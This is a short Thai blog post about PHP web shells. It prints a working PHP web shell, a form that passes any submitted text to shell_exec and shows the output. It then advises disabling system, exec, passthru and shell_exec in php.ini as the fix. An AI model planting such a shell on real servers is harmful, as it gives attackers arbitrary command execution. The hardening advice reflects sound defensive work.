GotoKnow
  • เข้าระบบ
  • สมัครสมาชิก
  • แผงจัดการ
  • ออกจากระบบ
GotoKnow

การ Hack เว็บบน Unix โดย Secure Shell ของ PHP

<HTML>
<BODY>
<PRE>

php">

<INPUT TYPE="TEXT" NAME="command">
<INPUT TYPE="Submit">
</FORM>
<PRE>
<?
$command = str_replace("\\\\","\\",$_POST[command]);
echo "<B>Results for $command: </B><P>";
$results = str_replace("<","&lt;",shell_exec($command));
$results = str_replace(">","&gt;",$results);
echo $results;
?>
</PRE>
<P>
<B>If this script works add this line to your PHP.ini:</B>
<FONT color="#ff0000">disable_functions=system,exec,passthru,shell_exec</FONT>
</BODY>
</HTML>

---------------------------------------------------------------------------

วิธีแก้ไข

ใน php.ini ตรง disable_functions

disable_functions=system,exec,passthru,shell_exec

 

Ref : http://www.irongeek.com/i.php?page=security/phpshell 

บันทึกนี้เขียนที่ GotoKnow โดย 

คำสำคัญ (keywords): hackingphpsecurity
หมายเลขบันทึก: 52894
เขียน:
แก้ไข:
อ่าน:
สัญญาอนุญาต: สงวนสิทธิ์ทุกประการ

ความเห็น (0)